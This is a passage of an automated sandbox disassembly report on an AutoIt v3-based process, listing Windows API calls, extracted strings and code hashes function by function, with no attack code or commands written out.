                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0031366B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: b3e046370aef65c31410bb12f3c46a781b91b3f189c6ef6ae76f3b27f50ce07c
                                                    • Instruction ID: e71c704adf652e1be733a14b5f3af24faeae39db1da9808513ea1cc9feab57a7
                                                    • Opcode Fuzzy Hash: b3e046370aef65c31410bb12f3c46a781b91b3f189c6ef6ae76f3b27f50ce07c
                                                    • Instruction Fuzzy Hash: B421E3B5901258AFDF12DFA4E889BDEBBBCFB09700F00521AF512AA2A0D7B54555CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0035073A: CreateFileW.KERNELBASE(00000000,00000000,?,00350AA4,?,?,00000000,?,00350AA4,00000000,0000000C), ref: 00350757
                                                    • GetLastError.KERNEL32 ref: 00350B0F
                                                    • __dosmaperr.LIBCMT ref: 00350B16
                                                    • GetFileType.KERNELBASE(00000000), ref: 00350B22
                                                    • GetLastError.KERNEL32 ref: 00350B2C
                                                    • __dosmaperr.LIBCMT ref: 00350B35
                                                    • CloseHandle.KERNEL32(00000000), ref: 00350B55
                                                    • CloseHandle.KERNEL32(?), ref: 00350C9F
                                                    • GetLastError.KERNEL32 ref: 00350CD1
                                                    • __dosmaperr.LIBCMT ref: 00350CD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: 3547fa2b7620e084e7a0d079bca0ab51fb767d8d03ed0cdd4da2e05502bbf353
                                                    • Instruction ID: 7c7d5acc1f1f567193522310b090f2b43509ebbd444ca2747b38cf92e484ff0a
                                                    • Opcode Fuzzy Hash: 3547fa2b7620e084e7a0d079bca0ab51fb767d8d03ed0cdd4da2e05502bbf353
                                                    • Instruction Fuzzy Hash: 41A13732A001448FDF2E9F78D892BAE7BA4AB06325F140259FC119F3E1D7329906CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0031551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00315539
                                                      • Part of subcall function 003151BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003151E1
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0031534B
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00354BD7
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00354C18
                                                    • RegCloseKey.ADVAPI32(?), ref: 00354C5A
                                                    • _wcslen.LIBCMT ref: 00354CC1
                                                    • _wcslen.LIBCMT ref: 00354CD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 98802146-2727554177
                                                    • Opcode ID: 4eee65a1d4e0e133ab2d81738737e0154fcc8d74d09da283215279b7a0371ad4
                                                    • Instruction ID: 82f609a3582cc151e49c9357dd086ecc7f3bb411c7fce558474115dfa752d72c
                                                    • Opcode Fuzzy Hash: 4eee65a1d4e0e133ab2d81738737e0154fcc8d74d09da283215279b7a0371ad4
                                                    • Instruction Fuzzy Hash: 9D716C75505340AEC32AEF65D885DABBBECFF99340F40052EF4458B1A1EB709A89CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00313465
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00313474
                                                    • LoadIconW.USER32(00000063), ref: 0031348A
                                                    • LoadIconW.USER32(000000A4), ref: 0031349C
                                                    • LoadIconW.USER32(000000A2), ref: 003134AE
                                                    • LoadImageW.USER32 ref: 003134C6
                                                    • RegisterClassExW.USER32 ref: 00313517
                                                      • Part of subcall function 003135AB: GetSysColorBrush.USER32(0000000F), ref: 003135DE
                                                      • Part of subcall function 003135AB: RegisterClassExW.USER32 ref: 00313608
                                                      • Part of subcall function 003135AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00313619
                                                      • Part of subcall function 003135AB: InitCommonControlsEx.COMCTL32(?), ref: 00313636
                                                      • Part of subcall function 003135AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00313646
                                                      • Part of subcall function 003135AB: LoadIconW.USER32(000000A9), ref: 0031365C
                                                      • Part of subcall function 003135AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0031366B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: a72421ccab094fe1e679e092b35c263859da083ae1b09dce08341a5f6e87af31
                                                    • Instruction ID: 91e83a197b66cd673d087285f51eca9503577f83f0b979e4faa93ed87ba72c50
                                                    • Opcode Fuzzy Hash: a72421ccab094fe1e679e092b35c263859da083ae1b09dce08341a5f6e87af31
                                                    • Instruction Fuzzy Hash: 5C214178D40358AFDB269F95EC85A9A7FBCFB08B50F00011AE505AA2A0C7B945458F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0031CE8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: p3>$p3>$p3>$p3>$p5>$p5>$x3>$x3>
                                                    • API String ID: 1385522511-2464186938
                                                    • Opcode ID: 9a15a3d43e25a29e7d828bbf82fa420c7f3641f51206b25142cc1225135baacb
                                                    • Instruction ID: aab0a2bd094e2a466a3eacc8afbfc1fe2259984fdd9eb16c59e7bbdf60e0523a
                                                    • Opcode Fuzzy Hash: 9a15a3d43e25a29e7d828bbf82fa420c7f3641f51206b25142cc1225135baacb
                                                    • Instruction Fuzzy Hash: B232E275A442059FCB2ACF58C885EFAB7B9FF48310F19D059E906AB291C774ED81CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00317953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00353A1C), ref: 00317973
                                                      • Part of subcall function 00316E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 00316E80
                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00313C17
                                                    • _wcslen.LIBCMT ref: 00313C96
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00313D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 2701412040-3738523708
                                                    • Opcode ID: d4fb48d0e357a8deb6480c4c842b402c0993035b2149338a477c9dee96425b87
                                                    • Instruction ID: ac5281e3b1b4358d057b45585bb3ee3f41818208071bfce6653bad153b892d89
                                                    • Opcode Fuzzy Hash: d4fb48d0e357a8deb6480c4c842b402c0993035b2149338a477c9dee96425b87
                                                    • Instruction Fuzzy Hash: E622B1715083409FC71AEF24D881AEFBBE5BF99314F04491DF4859B2A1DB70DA89CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00313236
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0031323E
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00313249
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00313254
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0031325C
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00313264
                                                      • Part of subcall function 0031318C: RegisterWindowMessageW.USER32(00000004,?,00312906), ref: 003131E4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003129AC
                                                    • OleInitialize.OLE32 ref: 003129CA
                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 003539E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: (&>$(s$0$>$0e$@(>$$>
                                                    • API String ID: 1986988660-52693568
                                                    • Opcode ID: 5064a07444b9f551c220d06f8f94c86ba00f242fa7a0a94e772e300e1b04fe9b
                                                    • Instruction ID: 1b89f718422f592875f1d87c5116ab39de6f187a7391fc35ed312d3f787cae4b
                                                    • Opcode Fuzzy Hash: 5064a07444b9f551c220d06f8f94c86ba00f242fa7a0a94e772e300e1b04fe9b
                                                    • Instruction Fuzzy Hash: 5A7192B49012848EC7ABDF2AEEA5A57BAECF74A304B40432ED419CF2E1EB705445CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D5>$D5>$D5>$D5>$D5>D5>$Variable must be of type 'Object'.
                                                    • API String ID: 0-54505318
                                                    • Opcode ID: fdc5c9a97cbfc4cee17a89c8bf86f9e70b81260219f92cabbded836856d2d8a8
                                                    • Instruction ID: 8f6432fa4f02cea7835129515409c7e8b571ba23968914b69c4d49eb5ce88e47
                                                    • Opcode Fuzzy Hash: fdc5c9a97cbfc4cee17a89c8bf86f9e70b81260219f92cabbded836856d2d8a8
                                                    • Instruction Fuzzy Hash: 9FC28C75E00215DFCB2ACF98C890BADB7B5FF09310F258169E945AB3A1D375AD81CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 003215A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: D5>$D5>$D5>$D5>$D5>D5>
                                                    • API String ID: 1385522511-3302898000
                                                    • Opcode ID: e837dcf2c78ee81a41479f78a49feb3d2f40f67d10032fcd8f0640b829684ba7
                                                    • Instruction ID: 572db66057045fab11d2692538ebe59862a2e1039407b450824731bab1ea4a0e
                                                    • Opcode Fuzzy Hash: e837dcf2c78ee81a41479f78a49feb3d2f40f67d10032fcd8f0640b829684ba7
                                                    • Instruction Fuzzy Hash: 0DB2A074A08360CFC72ACF18D480A2AB7E5BF99700F25895DE9859B392D731ED45CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00312A9B
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00312B3A
                                                    • UnregisterHotKey.USER32(?), ref: 00312D1F
                                                    • DestroyWindow.USER32(?), ref: 003539F5
                                                    • FreeLibrary.KERNEL32(?), ref: 00353A5A
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00353A87
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 37fd3acb2f83a4eb7160affa63eaeb03c55a7e6faeb8ba7ca50e60c433da5657
                                                    • Instruction ID: 17fc261a2703c08a5a4aa74e8a0f73b0d9c38b963ba96bd57654b83482c33fd5
                                                    • Opcode Fuzzy Hash: 37fd3acb2f83a4eb7160affa63eaeb03c55a7e6faeb8ba7ca50e60c433da5657
                                                    • Instruction Fuzzy Hash: 64D15A317012128FCB2BEF14C495EAAF7A4BF09741F15429DE84A6B661DB30ED66CF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00388907
                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0038891B
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00388945
                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0038895F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388971
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003889BA
                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00388A0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile
                                                    • String ID: *.*
                                                    • API String ID: 769691225-438819550
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%


                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 00313568
                                                    • CreateWindowExW.USER32 ref: 00313589
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 0031359D
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 003135A6
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031561C
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031563D
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003155EB,SwapMouseButtons,00000004,?), ref: 0031565F
                                                    Strings
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,003ADC30), ref: 0037DABB
                                                    • GetLastError.KERNEL32 ref: 0037DACA
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0037DAD9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003ADC30), ref: 0037DB36
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00354115
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                      • Part of subcall function 003139DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003139FD
                                                    Strings
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen
                                                    • String ID: X$`u=
                                                    • API String ID: 779396738-2749776380
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003309F8
                                                      • Part of subcall function 00333634: RaiseException.KERNEL32(?,?,?,00330A1A,?,00000000,?,?,?,?,?,?,00330A1A,00000000,003D9758,00000000), ref: 00333694
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00330A15
                                                    Strings
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00398C52
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00398C59
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00398E3A
                                                    Similarity
                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                    • String ID:
                                                    • API String ID: 146820519-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: _wcslen$_strcat
                                                    • String ID:
                                                    • API String ID: 306214811-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00316CA1
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00316CB1
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00315F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00316049
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0032FD44
                                                    • SetTimer.USER32 ref: 0032FD53
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0036FDD3
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer$Kill
                                                    • String ID:
                                                    • API String ID: 3500052701-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,0034895C,?,003D9CE8,0000000C), ref: 00348A94
                                                    • GetLastError.KERNEL32(?,0034895C,?,003D9CE8,0000000C), ref: 00348A9E
                                                    • __dosmaperr.LIBCMT ref: 00348AC9
                                                    Similarity
                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                    • String ID:
                                                    • API String ID: 490808831-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003497CA,FF8BC369,00000000,00000002,00000000), ref: 00349754
                                                    • GetLastError.KERNEL32(?,003497CA,FF8BC369,00000000,00000002,00000000,?,00345EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00336F61), ref: 0034975E
                                                    • __dosmaperr.LIBCMT ref: 00349765
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2336955059-0
                                                    • Opcode ID: efb5632bf8adde026a81950632b353cc46cecc25b55e4d95fb5f9bb08163075f
                                                    • Instruction ID: d3b07f3ea4a3f66a82fcee798fd49dbe3a22a2f61ca21af140aa4d1dcb12c261
                                                    • Opcode Fuzzy Hash: efb5632bf8adde026a81950632b353cc46cecc25b55e4d95fb5f9bb08163075f
                                                    • Instruction Fuzzy Hash: C9012832A20114AFCB079F99DC45DAF7F6EDB85330F24031AF8118F1A1EA30AD418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • TranslateMessage.USER32(?), ref: 0031F22B
                                                    • DispatchMessageW.USER32 ref: 0031F239
                                                    • PeekMessageW.USER32 ref: 0031F24F
                                                    • Sleep.KERNELBASE(0000000A), ref: 0031F261
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 0036327C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                    • String ID:
                                                    • API String ID: 3288985973-0
                                                    • Opcode ID: fcb48486b669207b12bb45064fcfc27b384e48dd02851ae4967490e5eb3fd0e0
                                                    • Instruction ID: 13611dfa9a3058b922c61663a950795225ea4071181ea4c80e48aa2fe4dbd45b
                                                    • Opcode Fuzzy Hash: fcb48486b669207b12bb45064fcfc27b384e48dd02851ae4967490e5eb3fd0e0
                                                    • Instruction Fuzzy Hash: 24F08234504381DBE73A8B60DC49FDB73ACAF89310F004A28F65AC70C0DB309588CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00322FB6
                                                    Strings
                                                    Memory Dump Source
